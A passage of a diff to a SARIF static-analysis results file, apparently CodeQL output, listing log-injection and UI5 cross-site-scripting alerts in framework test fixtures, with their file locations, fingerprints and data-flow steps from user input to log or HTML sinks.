+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 26, + "startColumn" : 19, + "endColumn" : 36 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "ccc6f77c65eccb45:1", + "primaryLocationStartColumnFingerprint" : "12" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 34, + "endColumn" : 54 + } + }, + "message" : { + "text" : "req2.params.category" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 13, + "endColumn" : 54 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + 
"physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 26, + "startColumn" : 32, + "endColumn" : 36 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 26, + "startColumn" : 19, + "endColumn" : 36 + } + }, + "message" : { + "text" : "\"console:\" + book" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 34, + "endColumn" : 54 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/log-injection", + "rule" : { + "id" : "js/log-injection", + "index" : 92, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 7, + "startColumn" : 18, + "endColumn" : 41 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "be9a18716e55d497:1", + "primaryLocationStartColumnFingerprint" : "13" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 6, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "jQuery. ... param\")" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 6, + "startColumn" : 9, + "endColumn" : 51 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 39 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 7, + "startColumn" : 18, + "endColumn" : 41 + } + }, + "message" : { + "text" : "`[INFO] ... 
value}`" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 6, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/log-injection", + "rule" : { + "id" : "js/log-injection", + "index" : 92, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 15, + "startColumn" : 18, + "endColumn" : 41 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "be9a18716e55d497:2", + "primaryLocationStartColumnFingerprint" : "13" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "req.url" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 13, + "endColumn" : 37 + } + }, + "message" : { + "text" : "url.par ... 
, true)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 9, + "endColumn" : 37 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 17, + "endColumn" : 18 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 17, + "endColumn" : 24 + } + }, + "message" : { + "text" : "q.query" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "q.query.username" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 9, + "endColumn" : 33 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 15, + "startColumn" : 34, + "endColumn" : 39 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 15, + "startColumn" : 18, + "endColumn" : 41 + } + }, + "message" : { + "text" : "`[INFO] ... value}`" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/log-injection", + "rule" : { + "id" : "js/log-injection", + "index" : 92, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 24, + "startColumn" : 18, + "endColumn" : 42 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "e197b363f9dc3962:1", + "primaryLocationStartColumnFingerprint" : "13" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "req.url" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 13, + "endColumn" : 37 + } + }, + "message" : { + "text" : "url.par ... 
, true)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 9, + "endColumn" : 37 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 17, + "endColumn" : 18 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 17, + "endColumn" : 24 + } + }, + "message" : { + "text" : "q.query" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "q.query.username" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 22, + "startColumn" : 9, + "endColumn" : 33 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 23, + "startColumn" : 39, + "endColumn" : 44 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 23, + "startColumn" : 18, + "endColumn" : 45 + } + }, + "message" : { + "text" : "jQuery. ... (value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 23, + "startColumn" : 9, + "endColumn" : 45 + } + }, + "message" : { + "text" : "value1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 24, + "startColumn" : 34, + "endColumn" : 40 + } + }, + "message" : { + "text" : "value1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 24, + "startColumn" : 18, + "endColumn" : 42 + } + }, + "message" : { + "text" : "`[INFO] ... 
alue1}`" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 21, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/log-injection", + "rule" : { + "id" : "js/log-injection", + "index" : 92, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/Sources/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 4 + }, + "region" : { + "startLine" : 5, + "startColumn" : 17, + "endColumn" : 33 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "45280b24f3d81287:1", + "primaryLocationStartColumnFingerprint" : "12" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/Sources/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 4 + }, + "region" : { + "startLine" : 5, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "req.responseText" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/Sources/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 4 + }, + "region" : { + "startLine" : 5, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "req.responseText" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/Sources/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 4 + }, + "region" : { + 
"startLine" : 5, + "startColumn" : 17, + "endColumn" : 33 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 5, + "startColumn" : 27, + "endColumn" : 32 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "92dbc37bdafc7694:1", + "primaryLocationStartColumnFingerprint" : "22" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "jQuery. ... 
param\")" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 9, + "endColumn" : 51 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 5, + "startColumn" : 27, + "endColumn" : 32 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 12, + "startColumn" : 27, + "endColumn" : 32 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "faa1832c387d2ee5:1", + "primaryLocationStartColumnFingerprint" : "22" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "documen ... .search" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 10, + "startColumn" : 9, + "endColumn" : 41 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 12, + "startColumn" : 27, + "endColumn" : 32 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : 
"js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 20, + "startColumn" : 27, + "endColumn" : 33 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "8291f53a2e235d15:1", + "primaryLocationStartColumnFingerprint" : "22" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 17, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "documen ... .search" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 17, + "startColumn" : 9, + "endColumn" : 41 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 18, + "startColumn" : 39, + "endColumn" : 44 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 18, + "startColumn" : 18, + "endColumn" : 45 + } + }, + 
"message" : { + "text" : "jQuery. ... (value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 18, + "startColumn" : 9, + "endColumn" : 45 + } + }, + "message" : { + "text" : "value1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 20, + "startColumn" : 27, + "endColumn" : 33 + } + }, + "message" : { + "text" : "value1" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 17, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", + "uriBaseId" : "%SRCROOT%", + "index" : 243 + }, + "region" : { + "startLine" : 132, + "startColumn" : 7, + "endLine" : 134, + "endColumn" : 16 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "63ace7b071639814:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 242 + }, + "region" : { + "startLine" : 23, + "startColumn" : 25, + "endColumn" : 48 + } + }, + "message" : { + "text" : "oSearch ... Value()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 242 + }, + "region" : { + "startLine" : 23, + "startColumn" : 11, + "endColumn" : 48 + } + }, + "message" : { + "text" : "searchValue" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 242 + }, + "region" : { + "startLine" : 27, + "startColumn" : 34, + "endColumn" : 45 + } + }, + "message" : { + "text" : "searchValue" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", + "uriBaseId" : "%SRCROOT%", + "index" : 243 + }, + "region" : { + "startLine" : 17, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ type: \"string\" }" 
+ } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", + "uriBaseId" : "%SRCROOT%", + "index" : 243 + }, + "region" : { + "startLine" : 133, + "startColumn" : 8, + "endColumn" : 27 + } + }, + "message" : { + "text" : "oControl.getTitle()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", + "uriBaseId" : "%SRCROOT%", + "index" : 243 + }, + "region" : { + "startLine" : 132, + "startColumn" : 7, + "endLine" : 134, + "endColumn" : 16 + } + }, + "message" : { + "text" : "\"
T ...
\"" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 242 + }, + "region" : { + "startLine" : 23, + "startColumn" : 25, + "endColumn" : 48 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 266 + }, + "region" : { + "startLine" : 14, + "startColumn" : 23, + "endColumn" : 41 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "fc87b07640e9d85:1", + "primaryLocationStartColumnFingerprint" : "10" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 271 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 267 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, 